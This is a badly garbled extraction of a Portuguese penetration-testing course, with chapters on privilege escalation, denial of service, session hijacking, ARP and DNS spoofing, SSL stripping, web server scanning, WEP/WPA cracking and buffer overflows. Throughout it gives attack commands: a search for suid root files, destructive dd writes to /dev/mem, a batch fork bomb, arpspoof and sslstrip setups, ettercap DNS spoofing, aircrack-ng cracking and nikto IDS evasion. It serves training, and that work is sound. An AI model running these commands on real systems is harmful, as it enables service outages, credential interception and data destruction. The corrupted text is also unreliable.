1%!2! Contramedidas ●

Filtrar os dados do usu3rioE permitindo somente o onjunto de arateres v3lidos para o tipo de dado permitido.

●

Criptografar >4S>s de senas.

●

HtiliDar SS/ e >$S.

●

'ão riar bla:listsE mas sim Gitelists

●

Xall input is evil .....Y


Capítulo 1) 7levação de Privil'gios ?o.ais

1)!1! "#$etivos ●

;ntender a elevação de privilgios

●

$rourar por possíveis alvos

●

;ntender as possibilidades de ataques loais

●

;ntender a elevação de privilgios

●

$rourar por possíveis alvos

●

;ntender as possibilidades de ataques loais

Capítulo 13 )le#ação de r%#%lg%o" o&a%" - 158

1)!%! " &ue ' es.alada de privil'gios( ;salação ou elevação de privilgios basiamente signifia adiionar mais direitos ou permiss%es para um usu3rio. ;m resumoE esalação de privilgios tenta transformar um usu3rio normal em um usu3rio administrativoE usu3rio om maior privilgios do que o usu3rio atual ou faDer om que um usu3rio partiipe de outros grupos loais na m3quinaE om privilgio diferente do privilgio atual do ataante. Ruando e$ InjetE que vimos anteriormente. 4lguns outros e
;
●

;
●

;
●

Ruando onseguimos uma sena loalE sem privilgio administrativo. ;<.? +rutefore em servidor ss


1)!)! Possíveis alvos 'ormalmenteE apliaç%es que possuem suidroot são as mais e000 P suidroot"t4t = less suidroot"t4t = find $ -perm -0>000 -e4ec ls -l h \

4lm de arquivos om suidrootE tambm podem ser e
1)!4! Passo a passo 1. Obter aesso loal ao sistema 2. $rourar possíveis alvos ". entar e

#. 4essar as informaç%es j3 om privilgio maior do que o privilgio anterior

1)!-! ?a#orat9rio 13.5.1. Desafio 1 1. 4travs do $>$ SellE e
testeE

2. +usar um e
13.5.2. Desafio 2 1. 4 outra tarefaE  e
1)!6! Contramedidas ●

6anter o sistema atualiDado.

●

-ei

Capítulo 14 Testando o sistema

14!1! "#$etivos ●

;ntender omo oorrem ataques de negação de serviço

●

;ntender o que  -oSE --oSE e -B-oS

●

;ntender o que  e omo realiDar sequestro de sessão

Capítulo 14 !e"tando o "%"tea - 162

14!%! " &ue ' negação de serviço( Ruem aompana os notii3rios de inform3tia ou o pr7prio +oletim 4nti,@írus 4nti,@írus do Info8ester ertamente j3 se deparou om matrias que itam ataques -oS ou ataques --oS a sites. O objetivo deste apítulo  dar e
Contra -'S da elefonia ✔

●

Contra sistema de votação do +++ ✔

●

SpeedA

9lobo

Contra sites de update ✔

update.mirosoft.om

Capítulo 14 !e"tando o "%"tea - 163 ●

Contra sites grandes? ✔

C''

✔

Taoo Taoo

14!)! @oS -e aordo om a definição do C;B Computer ;mergenA Besponse eamJE os ataques -oS -enial of ServieJE tambm denominados 4taques de 'egação de ServiçosE onsistem em tentativas de impedir usu3rios legítimos de utiliDarem um determinado serviço de um omputador. $ara issoE são usadas tnias que podem? sobr sobre earr arreg egar ar uma uma rede rede a tal tal pont ponto o em que que os verd verdade adeiro iross usu3 usu3ri rios os dela dela não não onsigam us3,la derrubar uma one<ão entre dois ou mais omputadores faDer tantas requisiç%es a um site at que este não onsiga mais ser aessado negar aesso a um sistema ou a determinados usu3rios. ;

e então passa a reusar novos pedidos. Outra forma de ataque omum  o H$- $a:et StormE onde um omputador faD soliitaç%es onstantes para que uma m3quina remota envie paotes de respostas ao soliitante. 4 m3quina fia tão sobrearregada que não onsegue e
ing da (orte (orte

14.3.1. Fe($lo e a"aM'es DoS

Em Ginu3 ? U :J :V:_ h\: U dd ifL$dev$6ero ofL$var$spool$mail$meuKusua ofL$var$spool$mail$meuKusuario rio U perl Q e %#ile J  for&J\ open Uf#, bZ$proc$meminfo\ bZ$proc$meminfo\ open U#f, bP$tmp$)la\ h U dd ifL$dev$urandom ofL$dev$mem U perl -e for& %#ile for&

Em indos? indos? ●

;m um .bat? [*M[* Ou? :s start M0

Capítulo 14 !e"tando o "%"tea - 165 goto :s

14.3.2. Pr"i!a iri#ia ●

C#

O C#  uma ferramenta que gera ataques de -oS em redes loais om ST' Flood . @amos oneV,la um pouo maisE digitando no terminal? U"$c>

Com esse omandoE teremos omo retorno a sinta
defaults to random J

,t atta: timeout

defaults to foreverJ

,l [ of bo< lin: to use

defaults to 1**[ J

@amos @amos formar duplas e realiDar ataques de -oS na m3quina do ompaneiro de e
14!4! @@oS O --oSE sigla para -istributed -istributed -enial -enial of ServieE ServieE  um ataque -oS ampliadoE ampliadoE ou sejaE que utiliDa at milares de omputadores para ataar um determinado alvo.


;sse  um dos tipos mais efiaDes de ataques e j3 prejudiou sites oneidosE tais omo os da C''E 4maDonE TaooE 6irosoft e e+aA. $ara que os ataques do tipo --oS sejam bem,suedidosE  neess3rio que se tena um nQmero grande de omputadores para faDerem parte do ataque. Hma das melores formas enontradas para se ter tantas m3quinasE foi inserir programas de ataque --oS em vírus ou em softGares maliiosos. ;m um primeiro momentoE os a:ers que riavam ataques --oS tentavam ZesraviDarZ omputadores que agiam omo servidores na internet. Com o aumento na veloidade de aesso à internetE passou,se a e

Como e
14.4.1. 9erra(en"a e DDoS

TF7*? ;sta foi a primeira ferramenta de ataque --oS disponível publiamente. O F' foi esrito por 6i
H-$ Flooding

●

C$ ST' Flooding

●

IC6$ Flooding

●

e Smurf 4tta:.

O ontrole dos mestres  feito por lina de omandoE e a e

programa deve ser aompanada dos parUmetros desejados om a sinta
14!-! Prin.ipais tipos de ata&ues 14.5.1. Pin# 9loo $ing flood  um ataque de negação de serviço simples no qual o ataante sobrearrega o sistema vítima om paotes IC6$ ;o Bequest paotes pingJ. ;ste ataque apenas  bem suedido se o ataante possui mais largura de banda que a vitima. Como a vitima tentar3 responder aos pedidosE ir3 onsumir a sua largura de banda impossibilitando,a responder a pedidos de outros utiliDadores. 4s Qnias maneiras de proteger deste tipo de ataque  limitando o tr3fego do ping na sua totalidade ou apenas limitando o tr3fego de paotes IC6$ ;o Bequest om um tamano menos elevado.


14.5.2. SN 9loo ST' flood ou ataque ST'  uma forma de -oSJ em sistemas omputadoriDadosE na qual o ataante envia uma seqVnia de requisiç%es ST' para um sistema,alvo. Ruando um liente tenta omeçar uma one<ão C$ om um servidorE o liente e o servidor troam um srie de mensagensE que normalmente são assim? ●

●

●

O liente requisita uma one<ão enviando um ST' sAnroniDeJ ao servidor. O servidor onfirma esta requisição 4Ca:noGledgeJ de volta ao liente.

mandando

um

ST',

O liente por sua veD responde om um 4CE e a one<ão est3 estabeleida.


Isto  o amado aperto de mão em trVs etapas ree,8aA >andsa:eJ.

Hm liente maliioso pode não mandar esta Qltima mensagem 4C. O servidor ir3 esperar por isso por um tempoE j3 que um simples ongestionamento de rede pode ser a ausa do 4C faltante. ;sta amada one<ão semi,aberta pode oupar reursos no servidor ou ausar prejuíDos para empresas usando softGares lieniados por one<ão. $ode ser possível oupar todos os reursos da m3quinaE om paotes ST'. Hma veD que todos os reursos estejam oupadosE nenuma nova one<ão legítima ou nãoJ pode ser feitaE resultando em negação de serviço. 4lguns podem funionar mal ou at mesmo travar se fiarem sem reursos desta maneira. 4o ontr3rio do que muitos pensamE não resolve ataque negação de serviço por SAn flood limitando a quantidade de one<%es por minuto omo usar o m7dulo limit ou reent do iptablesJE pois as one<%es e<edentes seriam desartadas pelo fireGallE sendo que desta forma o pr7prio fireGall tiraria o serviço do ar. Se euE por e

O fireGall tornou a tarefa do ataante ainda mais f3il. Hm ataque de SAn Flood  feito om os I$s forjados spoofJE para que o ataante não reeba os SAn, 4Cs de suas falsas soliitaç%es.

14.5.3. S('rf &""a!/ O Smurf  outro tipo de ataque de negação de serviço. O agressor envia uma r3pida seqVnia de soliitaç%es de $ing um teste para verifiar se um servidor da Internet est3 aessívelJ para um endereço de broadast. Hsando spoofingE o ataante faD om que o servidor de broadast enamine as respostas não para o seu endereçoE mas para o da vítima. 4ssimE o omputador, alvo  inundado pelo $ing.

14!6! Re.omendaç*es = sugerido que o $en,tester seja auteloso om o uso desse tipo de ataque ou de ferramentas que possam ausar uma negação de serviço. ;<eto em asos que o liente soliite tal tipo de ataqueE não devemos realiDar esse ataqueE pois pode prejudiar os neg7ios da empresa.


14!! Se&uestro de Sessão 4 idia por detr3s do ataque de sequestro de sessãoE ou session ija:ingE  justamente utiliDar redeniais v3lidas para aessar reursos que não estão disponíveis publiamente. Hm e a partir de uma sessão aberta de um usu3rio v3lido. Outro e  o ssmitmE instalado a partir da suite dsniff funiona apenas na versão SS>1J. Sinta3e) ssmitm c,dh c,Ih c,p portah ost cportah 'arKmetros) ●

,d

;nable verbose debugging output.

●

,I

6onitor & ija: an interative session.

●

,p port

SpeifA te loal port to listen on.

●

ost

SpeifA te remote ost to relaA onnetions to.

●

port

SpeifA te remote port to relaA onnetions to.

14.7.1. 9erra(en"as Outras ferramentas interessantes que podemos itarE são?


●

Fireseep

●

Session ief

●

>unt

●

●

Puggernaut SS/ Strip

14!2! Contramedidas InfeliDmente não e

14.8.1. 9in DoS = uma ferramenta que foi desenvolvida por um 7rgão do F+I em função da grande quantidade de ataques --oS oorridos. O find_ddos loaliDa no sistema os masters e agentes das ferramentas rin**E ribe Flood 'etGor:E F'2: e Staeldrat.


Capítulo 1T'.ni.as de Sniing

1-!1! "#$etivos ●

;ntender 4B$ $oisoning

●

;ntender os protoolos susetíveis a sniffer

●

;ntender a diferença entre >H+ e SGit

●

;ntender -'S $arming

Capítulo 15 !&n%&a" de Sn%ff%ng - 176

1-!%! " &ue ' um snier( Sniffer  uma ferramenta apaD de apturar todo o tr3fego de uma rede. 4ssim sendo  possível apturar tr3fego maliioso de trojans e tambm apturar as senas que trafegam sem riptografia pela rede. 4p7s uma invasão  omum que um ra:er instale um sniffer na m3quina ataada para visualiDar as senas que trafegam em busa de mais aessos dentro da rede. ;mbora seja mais f3il apturar paotes em uma rede que utiliDa ubsE tambm  possível realiDar a aptura de dados em redes que utiliDam sGites. 4 tnia de sniffer vem de tempos remotosE quando ouve a neessidade da riação de ferramentas deste tipo para depuração de problemas de rede. $ormE om o tempoE devido a forma que as redes funionavamE as pessoas omeçaram a usar isto para fins maliiososE omo faDer ZesutaZ do tr3fego da rede em busa de informaç%es sensíveis omo e,mailsE ontas de ftpE telnetE snmpE dentre outros.

1-!)! Como surgiu o snier( 4 aptura de tais dados era muito trivial em redes que possuíam >H+sE onde a informação trafegada  repliada por toda a rede. Como evoluçãoE surgiram os sGitsE onde a rede passou a trabalar de forma mais segmentadaE enaminando os paotes apenas para a porta onde estava onetado a maquina de destinoE om isso difiultou o uso de ferramentas de sniffer. /ogoE om o apareimento dos sGits surgiram tambm diversas formas de faDer um XbA,passYE uma delas onsistia em XfloodarY a tabela C46 do sGit. ;sta tabela fia na 3rea de mem7ria onde o sGit mantm o mapeamento de $OB4 LN 64C. Ruando faDemos o floodE diversos sGits não onseguem mais aresentar nenuma entrada nela passando a funionar omo um >H+. Hm e

do dsniff. 4bai:F:cB:!F:cF:cE )a:B!:A:F>:>e:E 0"0"0"0"F>BF0 P 0"0"0"0">E8>A: S >>B08FF:>>B08FF0J %in !B B):B!:eB:d:E):dd a>:!:E:):FA:B 0"0"0"0"88A P 0"0"0"0"BE0B: S FFEB!EE8:FFEB!EE80J %in !B Fa:dE:cf:EF:f>:ff Ae:eF:B:B):F!:c! 0"0"0"0">FF8 P 0"0"0"0"BE: S 8!BE0>E8:8!BE0>E80J %in !B Ba:E:B>:Ed:c:a F:E8:>8:A:Ac:f8 0"0"0"0">A>! P 0"0"0"0"FAB: S EFE:EFE0J %in !B Ed:B8:c:>E:Fe:)a 8A:!:cA:a:>:cc 0"0"0"0"8B P 0"0"0"0"!!>0: S !00FB8:!00FB80J %in !B e>:)8:Ea:>A:BE:) E:)a:E:Ee:0:> 0"0"0"0"F!8F P 0"0"0"0"FB!B: S 8FBAF!BB:8FBAF!BB0J %in !B a>:f!:E:>E:)a:cE d:F:8:Ff:!F:ce 0"0"0"0"F00 P 0"0"0"0"!>E: S !0F!!0:!0F!!00J %in !B A:8e:aF:Fd:8a:)> 8f:)c:0:>0:B:c 0"0"0"0"FB80 P 0"0"0"0"E>: S B>!FBBEA:B>!FBBEA0J %in !B 8d:0:Ba:a:>: d>:>):a:):!:f 0"0"0"0"F P 0"0"0"0">BA: S !0!>>8B08:!0!>>8B080J %in !B

Outra tnia que surgiu para sniffar redes om sGits  a tnia de 4B$ $oisonE ou 4B$ Spoof. Ruando um omputador vai iniiar a omuniação om algum outro ostE devido ao modo de funionamento da pila de protoolosE  preiso traduDir seu endereço l7gio I$J no endereço físio 64CJ do seu destinat3rioE observemos abaiJ ) ) timeLE"F ms --- AB"F8"B" ping statistics -- pac&ets transmitted,  received, 0M pac&et loss, time 0ms rtt min$avg$ma4$mdev L E"F!$E"F!$E"F!$0"000 ms t%m:]=

S8ell*? t%m:]= tcpdump -ni et#0 #ost AB"F8"B" tcpdump: ver)ose output suppressed, use -v or -vv for full protocol decode listening on et#0, lin&-t arp %#o-#as AB"F8"B" tell AB"F8"B"0 0:B:0A"0F0FF arp repl< AB"F8"B" is-at 00:8:A:8d:aa:8B

Capítulo 15 !&n%&a" de Sn%ff%ng - 178 0:B:0A"0F08A I AB"F8"B"0 P AB"F8"B": I?( ec#o request, id 8>>, seq , lengt# F> 0:B:0A"0FBB0! I AB"F8"B" P AB"F8"B"0: I?( ec#o repl<, id 8>>, seq , lengt# F> > pac&ets captured E pac&ets received )< filter 0 pac&ets dropped )< &ernel t%m:]=

Como observamosE para que o ost 152.10.2.1*" onsiga se omuniar om o 152.10.2.1 para o envio do IC6$_;C>O_B;RH;S pingJ  neess3rio saber o endereço 64C do destinat3rioE ele onsegue isso enviando um paote ao endereço de broadast físio FF?FF?FF?FF?FF?FFJ perguntando quem  o 64C daquele determinado I$E o dono do I$ responde a requisiçãoE somente ap7s isto a omuniação oorre. 4p7s esta resolução a maquina loal oloa a resolução em seu ae loalE que pode ser visto om o omando arpE observe abaiB:? Wet#erX on et#0 7 AB"F8"B"J at 00:8:A:8D://:8B Wet#erX on et#0 t%m:]=

+aseados nistoE voVs j3 devem imaginar omo o 8indoGs desobre que e
1-!4! rp Spoo @amos evoluindo nossa e

I$_RH;_4_64RHI'4_4/@O_;S4_S;_CO6H'IC4'-O LN S;H_64C. Com isso quando a maquina alvo for montar o paote para envio ela montara om o I$ real do servidor de destino que ela quer aessarE porem utiliDar3 S;H endereço 64CE ou sejaE quando este paote passar pelo sGit o mesmo enaminar3 o paote para voV. = arpspoof -i ZINT9O/?P -t ZIKD'K/@Y'P ZIKKSK/@Y'KY/IK(//9K/9/KSK(/?P = arpspoof -i et#0 -t AB"F8"" AB"F8""E

'o e$ipKfor%ard

1-!-! SS?Strip O funionamento do SS/Strip  simplesE substituindo todas as requisiç%es Zttps?&&Z de uma p3gina por Zttp?&&ZE realiDa um 6I6 6an,In,e,6iddleJ entre o servidor e o liente. 4 idia  que a vítima e o ataante se omuniquem atravs de >$E enquanto o ataante e o servidor se omuniam em >$SE om o ertifiado do servidor. $ortantoE o ataante  apaD de ver todo o tr3fego da vítima em te

Configurar o I$ ForGarding? = ec#o b P $proc$s$ipKfor%ard

Bedireionar o tr3fego om iptables? = ipta)les -t nat -/ 99'TIN -p tcp --dport 80 -1 9DI9?T --to-port 8080

BealiDar um ataque 4B$ 6I6 entre as 2 m3quinas? = arpspoof -i et#0 -t ;'STK/@Y' /T/j

Iniiar o SS/StripE definindo um arquivo onde armaDenar3 os dados apturados? = sslstrip -a -l 8080

$ara visualiDar o que foi apturadoE basta e
1-!6! Prin.ipais proto.olos vulner/veis a snier Os protoolos itados abai
Capítulo 15 !&n%&a" de Sn%ff%ng - 181 ●

elnet

●

Blogin

●

>$

●

S6$

●

''$

●

$O$

●

F$

●

I64$

1-!! Prin.ipais Aerramentas 15.7.1. Dsniff -sniff possui diversas ferramentas em seu paote de dados. ambm possui diversos filtrosE apaD de interpretar dados de diversos protoolos. $ara e
15.7.2. F""er!a$ ;
Capítulo 15 !&n%&a" de Sn%ff%ng - 182 = ettercap QTq Q( /9 $$ $$ - dnsKspoof

Os omandos aima realiDam 4B$ Spoof entre todos os osts da rede e o segundo omando realiDaE alm de faDer o 4B$ SpoofE faD tambm o -'S Spoof. $ormE podemos e
15.7.3. TCPD'($ O tpdump  um dos maisE se não o mais ZfamosoZ sniffer para sistemas 9'H&/inu<. Com ele podemos realiDar an3lises de redes e soluionar problemas. Sua utiliDação  simples e sem mistriosE bastando apenas ter os oneimentos b3sios de redes C$&I$. 4 instalação do tpdump em sistemas -ebian  super simplesE bastando e
E3emplos? = tcpdump -i et#0 = tcpdump -i et#0 src #ost AB"F8"0"A = tcpdump -i et#0 dst #ost AB"F8"0" = tcpdump -i et#0 not #ost AB"F8"0"8 = tcpdump -i et#0 dst port 80 = tcpdump -i et#0 src port B88 = tcpdump -ni et#0 src net 0"0"0"0$B> and dst #ost AB"F8"0" and dst port 80 = tcpdump -i et#0 -n -s !00 -c 000 -% file"cap


'arKmetros? ●

,s qtde de bAtes apturados do paote o padrão  0J

●

, qtde de paotes

●

,G armaDenar no arquivo

15.7.4. iresar/ 8iresar:E o bom e velo ;terealE  um poderoso snifferE que permite apturar o tr3fego da redeE forneendo uma ferramenta poderosa para detetar problemas e entender melor o funionamento de ada protoolo.


1-!2! @,S PEarming ;m inform3tia $arming  o termo atribuído ao ataque baseado na tnia -'S ae poisoningE que onsiste em orromper o -'S em uma rede de omputadoresE faDendo om que a HB/ de um site passe a apontar para um servidor diferente do original. 4o digitar a HB/ do site que deseja aessar um banoE por e
ttp?&&GGG.tenialinfo.net&papers&$arming.tml

●

ttp?&&GGG.tenialinfo.net&papers&$arming2.tml


15.8.1. &"aM'e DNS

$ara redireionar para um site Geb espeífio? = cd $usr$s#are$ettercap$ = mv -f etter"dns etter"dns"old = vim etter"dns  / 44"44"44"44 %%%dotJtestdotJcom

;
  domínio ou ip que ser3 redireionado

●

<<<.<<<.<<<.<<<  I$ do site falso

●

GGG.sitefalso.om.br  HB/ do site falso

Comando? = ettercap -i et#0 -T -q - dnsKspoof -( arp $$ $$

1-!! Pr/ti.a dirigida 1. -efinir duplas para a pr3tia. 2. ;speifiar o site que ser3 redireionado e para onde ser3 feito o redireionamento. ". /ançar o ataque no ompaneiro de pr3tiaE e depois inverter os papisE onde ser3 o ataante e o outro o alvo.


1-!10! Contramedidas 4 melor defesa ontra um sniffer de rede  a riptografia. 4 riptografia não previne o ataque de snifferE pormE um ataante não onseguir3 identifiar os dados que ele apturou. ambm e

Capítulo 16 ta&ues a Servidores 57H

16!1! "#$etivos ●

4prender omo enontrar vulnerabilidades em servidores Geb

●

Coneer diferentes as diferenças entre 4pae e IIS

●

-esobrir omo e
Capítulo 16 ;ta
16!%! Tipos de ata&ues Servidores 8;+ normalmente são os primeiros alvos de ataante que queira entrar numa rede que tena uma -6` om servidores pQblios sendo e
16.2.1. DoS ●

Pamming 'etGor:s

●

Flooding Servie $orts

●

6isonfiguring Bouters

●

Flooding 6ail Servers

16.2.2. DDoS ●

F$ +oune 4tta:s

●

$ort Sanning 4tta:

●

$ing Flooding 4tta:

●

Smurf 4tta:

●

ST' Flooding 4tta:

●

I$ Fragmentation&Overlapping Fragment 4tta:

Capítulo 16 ;ta
I$ Sequene $redition 4tta:

●

-'S Cae $oisoning

●

S'6$ 4tta:

●

Send 6ail 4tta:

O grande riso de servidores 8;+E  que os mesmo estão 2# oras no arE ) dias por semana. >avendo qualquer vulnerabilidade ou erro na onfiguração não 3 dQvida de que em um determinado momento ser3 e
16!)! Aingerprint em 5e# Server 4ntes de testar qualquer tipo de ataque ontra um servidor 8;+ que tena sido desoberto ao longo do proesso de teste de invasãoE preisamos ter aesso à algumas informaç%es b3sias sobre nosso alvo. Hm dos meios de se onseguir isso  atravs do fingerprint realiDado sobre o servidor 8;+E ou simplesmente usando o domínio ospedado no mesmo omo parUmetro. 4 seguirE vamos ver uma ferramenta que realiDa esse proedimento automatiamenteE bastando que informemos o nome do domínio ospedado.

Capítulo 16 ;ta
16.3.1. :""$rin"

Ferramenta para pegar o banner de identifiação do servidor Geb.

4 partir da imagem aimaE usando um site qualquer omo e
6irosoft,IIS&(.*E om 12."#[

●

6irosoft,IIS&(.1E om 12E"#[

●

4pae&1.".20E om 12E"#[

Capítulo 16 ;ta
16!4! @es.o#rindo =ulnera#ilidades .om ,i
$odemos adiionar o sinaliDador de evasãoE que tenta ontornar seus sistemas de I-S? = perl ni&to"pl -# %%%"4<6"com")r -evasion 

;$J permite a banaliDação de servidores Geb na internetE onfigurados om vistas apenas a funionalidadeE sem onsiderar quest%es relativas à segurança. 4 insegurança do servidor Geb não depende e<lusivamente de falas de onfiguração ou vulnerabilidades de softGareE muitas veDes os pr7prios usu3rios GebmastersJ omprometem a segurança dos serviço. Ruem  da 3rea om erteDa j3 deparou,se om arquivos do tipo site.DipE senas.t
Capítulo 16 ;ta
no publi_tml. 6uitos aam que pelo fato do diret7rio possuir ,Inde
16!-! uditoria e 78ploração de 5e# Servers .om 5)A

;ssa ferramenta  um frameGor: para auditoria e ataque em apliaç%es Geb. 2gina do pro1eto: #ttp:$$sourceforge"net$pro1ects$%af$ Yídeos: #ttp:$$%af"sourceforge"net$videos$video-demos"p#p

O mais interessanteE  que podemos personaliDar os testes que essa ferramenta pode realiDarE podendo utiliDarE tambmE profiles previamente onfigurados por padrão. emosE por e
Capítulo 16 ;ta
16!6! "nline S.anner >3 v3rias ferramentas online que podemos utiliDar para faDer a varredura de Geb servers e obter informaç%es neess3rias para a e
O site 'etraft oferee informaç%es sobre as onfiguraç%es do servidor onde o site est3 ospedadoE sobre domínios vinulados ao que est3 sendo pesquisado e muitas outras informaç%es importantes para podermos realiDar um ataque om suesso.

P3 o `ero-aASanE  um site que permite faDer a varredura em busa de vulnerabilidades que posam e
Capítulo 16 ;ta
O Qnio empeilo para realiDar um ataque desse tipoE  que  neess3rio ospedar um arquivo t
16!! Contramedidas ●

●

●

BealiDar onstantes verifiaç%es nas onfiguraç%es de segurança dos servidores Geb. 4tualiDar onstantemente os servidores. -iminuir ao m3
Capítulo 16 ;ta
Capítulo 1 ta&ues a Redes Sem Aio

1!1! "#$etivos ●

;ntender as tnias para aessar as redes sem fio

●

Hma visão sobre 8;$E 8$4 e as tnias de ataque

●

;ntender omo funiona o ataque baseado em BainboG ables

Capítulo 17 ;ta
1!%! Introdução 'una dei
ter

aesso

a

informaç%es

Hma rede Gireless mal projetada pode driblar todo o arsenal de defesa j3 implementado. @amos imaginar a seguinte situação? sua empresa oloou uma murala e
1!)! 5ardriving Hm dos ataques mais omuns e omentados em redes Gireless  o 8ar -rivingE que tem omo objetivo XandarY om um dispositivo Gireless em busa de 4ess $oints. ;sse ataque tira proveito de uma araterístia fundamental?  difíil ontrolar e limitar o alane de redes Gireless. O ataante pode estar neste e
Capítulo 17 ;ta
1!4! ta&ues ao proto.olo 57P 4s informaç%es que trafegam em uma rede Gireless podem ser riptografadas. O protoolo 8;$ 8ired ;quivalent $rivaAJ aplia riptografia avançada ao sinal e verifia os dados om uma Xave de segurançaY eletr\nia. $ormE a Hniversidade de +er:eleA revelou a possibilidade de alguns tipos de ataques que eumpreA Ceung esreveu o artigo >oG o Cra: 8;$E desrevendo passo a passo omo desobrir a sena do protoolo 8;$. O artigo pode ser obtido na url ttp?&&GGG.isaa.s.ber:eleA.edu&isaa&Gep, faq.tml. 4p7s a publiação do artigoE surgiram algumas ferramentas que e
Coloando a interfae Gireless em modo monitor? = airmon-ng start %lan0

Iniiando a aptura dos paotes? = airodump-ng --ivs -% %ep -c canalKdaKrede mon0

Onde? ,  Canal

Capítulo 17 ;ta
,G  $refi
Onde? ,1  Opção para mandar uma autentiação falsa *  empo para reassoiaçãoE em segundos ,e  ;SSI- do alvo 'ome do aess pointJ ,a  6a 4ddress do 4ess $oint ,  'osso 64C 4ddress Glan*  'ossa interfae Gireless 4goraE vamos tentar enviar arp request para a redeE na tentativa que alguma maquina reeba e omee a enviar arp replaA para n7sE aumentando o tr3fego rapidamente. Isso pode ser observado na tela do airodump,ngE onde a quantidade de Z-44Z apturada aumentar3 rapidamente. = airepla<-ng - -) 00:00:00:00:00:0 -# 00:00:00:00:00:0B %lan0

Onde? ,"  Opção para arp request ,b  64C 4ddress do 4ess $oint ,  64C 4ddress usado na assoiação. 'esse asoE o nosso 64C Glan*  'ossa interfae Gireless 4gora que temos uma quantidade grande de paotesE podemos e
Capítulo 17 ;ta
airra: para de fatoE desobrirmos a ave? =aircrac&-ng -a  %ep-0"ivs

Onde? ,a  6odo para forçar um determinado tipo de ataque 1  8;$ Gep,*1.ivs  4rquivo gerado pelo airodump,ng seleionamos o prefi
1!-! SSI@ ".ulto Os SSI- oultos podem ser failmente detetados atravs de sniffersE uma veD que o seu nome  trafegado sem riptografia em uma rede. $or issoE oultar um SSInão aumenta a segurança de uma rede sem fio. O pr7prio airra:E utiliDando o airodumpE j3 nos mostra todos os SSI-E inluindo os oultos. Caso um SSI- não seja e
1!6! 3C Spooing 4lgumas pessoas areditam que estão seguras ap7s liberar o aesso aos seus 4ess $oints apenas para determinados 64C 4ddress. O 64C addressE que  um valor que vem de f3bria nas nossas interfaes de redesE pode ser alterado. = relativamente simples XforjarY o endereço físio da sua plaa de rede. $ortantoE não podemos onfiar apenas nesse ontrole para garantir a segurança de

Capítulo 17 ;ta
uma rede sem fio. ;
; omo podemos oneer o 64C 4ddress de um usu3rio de uma determinada rede! SimplesE sniffer novamente. Como e
1!! 5P Hrute Aor.e Bedes om 8$4 ainda não possuem uma vulnerabilidade omo o 8;$E onde onseguimos desobrir a ave ap7s analisar o tr3fego depois de um erto período de tempo. $ormE  possível realiDar brute fore ontra o as da sena enviada durante a one<ão entre um liente v3lido da rede e tentar desobrir a sena utiliDada para one<ão à rede. @amos e
Onde? ,  anal ,G  prefi
Onde?

Capítulo 17 ;ta
,* (  opção de deautentiaçãoE enviando ( requisiç%es ,a 64C 4ddress do 4ess $oint alvo , 64C 4ddress do liente que vamos deautentiar Glan*  nossa interfae Gireless Ruebrando a sena apturada om o airodump,ng? = aircrac&-ng -a B -% %ordlist"t4t %pa-0"cap

Onde? ,a  6odo para forçar um determinado tipo de ataque 2  8$4&8$42,$S ,G Gordlist Gpa,*1.ap  arquivo gerado pelo airodump,ng

1!2! 5P Rain#oG Ta#les Como j3 visto anteriormenteE sabemos que a quebra de senas om rainboG tables  muito mais r3pida do que om Gordlist. Como o algoritmo de enriptação do protoolo 8$4  mais forte do que 8;$E  neess3rio utiliDarmos rainboG tables para quebrar suas senas. $rograma para usar rainboG tables? "$co%patt< -r WdumpX -d Wrain)o%Kta)leX -s WSSIDX

#ttp:$$%%%"securit-video"asp4

Capítulo 17 ;ta
-oGnload de rainboG tables? #ttp:$$%%%"securit<-data)ase"com$tools%atc#$/-9ain)o%-Ta)les'ffensive"#tml

1!! Rougue ..ess Point Bougue 4ess point são 8/4' 4ess $oints que não estão autoriDados a onetar em uma rede. Hm Bougue 4$ abre um XburaoY Gireless na rede. Hm a:er pode implantar um rougue 4ess point ou um funion3rio pode riar um problema de segurança sem saberE simplesmente onetando um 4ess $oint desonfigurado na rede da empresa. Hma veD que foi identifiado um novo 4$ na redeE sem onfiguraçãoE basta que onfiguremos a nossa interfae de rede para se onetar nesse novo ambiente desprotegido. #ttp:$$%%%"securit
1!10! 5ii PEisEing 8iFi pising oorre em otspots pQblios onde usu3rios utiliDam aess points. O ataante aproveita,se do fato de que os SSI- estão visíveis a todos na 3rea oberta pela rede. O ataante utiliDa,se dessa informação e onfigura um aess point om o mesmo SSI- para onvener os usu3rios a se onetarem no aess point falso. Hm mtodo mais sofistiado ainda  forçar os usu3rios a se desonetar do

Capítulo 17 ;ta
aess point real e então onetar ao aess point do ataante. Ferramenta para onfigurar um aess point? ="$airsnarf

1!11! Contramedidas ●

HtiliDar senas fortes nos 4ess point

●

'ão usar 8;$

●

'ão onfiar em ontrole de aesso via 64C 4ddress

●

$ossuir uma polítia de segurança atualiDadaE que ontrole as redes sem fio.

Capítulo 17 ;ta
Capítulo 12 78ploits

12!1! "#$etivos ●

●

;ntender o que  um +uffer OverfloG 4prender omo e
Capítulo 18 )=plo%t" - 205

12!%! 3as ainalF o &ue ' um e8ploit( Hm e
12!)! "rgani>ação dos Pro.essos na 3em9ria $ara entendermos omo funiona um buffer overfloGE n7s preisaremos entender omo funiona a pila sta:J. 4 região de te

destas. O endereço de base da pila  fi e $O$ implementadas pelo proessador. O registrador amado Zponteiro de pilaZ S$J aponta para o topo da pila. 4 pila onsiste em uma seqVnia de frames que são oloados no topo quando uma função  amada e são retirados ao final da e e $O$. 'a arquitetura Intel <0E o registrador ;+$  utiliDado para esse prop7sito. $or ausa da disiplina de resimento da pilaE parUmetros reais tVm desloamentos positivos e vari3veis loais tVm desloamentos negativos a partir de F$. 4 primeira instrução que um proedimento deve e

salvar o F$ anteriorE para que possa ser restaurado ao fim da e
12!4! SEell.ode Sellode  um grupo de instruç%es assemblA em formato de opode para realiDar diversas funç%es omo amar uma sellE ou esutar em uma porta. 9eralmenteE um sellode  utiliDado para e

S8ellcode  6U3bbU3<
12!-! Huer "verloG Hm buffer overfloG aontee quando um programa vulner3vel a esse tipo de fala tenta opiar mais informaç%es para dentro de um buffer do que esse buffer onsegue suportar. $ara visualiDar issoE  a mesma oisa que pegar uma garrafa de refrigerante de 2 litros e virar ela toda num opo de (**ml. Com erteDa oorrer3 uma sujeira na mesa em que isso foi feitoE e  a mesma oisa que oorre na mem7riaE um esparramado de arateres sobre a mem7ria que ir3 sobresrever informaç%es importantes assim omo o refrigerante sujou toda a toala da mesa. 4s vulnerabilidades de buffer overfloG são onsideradas ameaças rítias de segurançaE apesar de ser uma fala bem oneida e bastante sriaE que se origina e<lusivamente na ignorUnia do programador referente a aspetos de segurança durante a implementação do programaE o erro se repete sistematiamente a ada nova versão ou produto liberado. ;ste tipo de vulnerabilidade tem sido largamente utiliDado para a 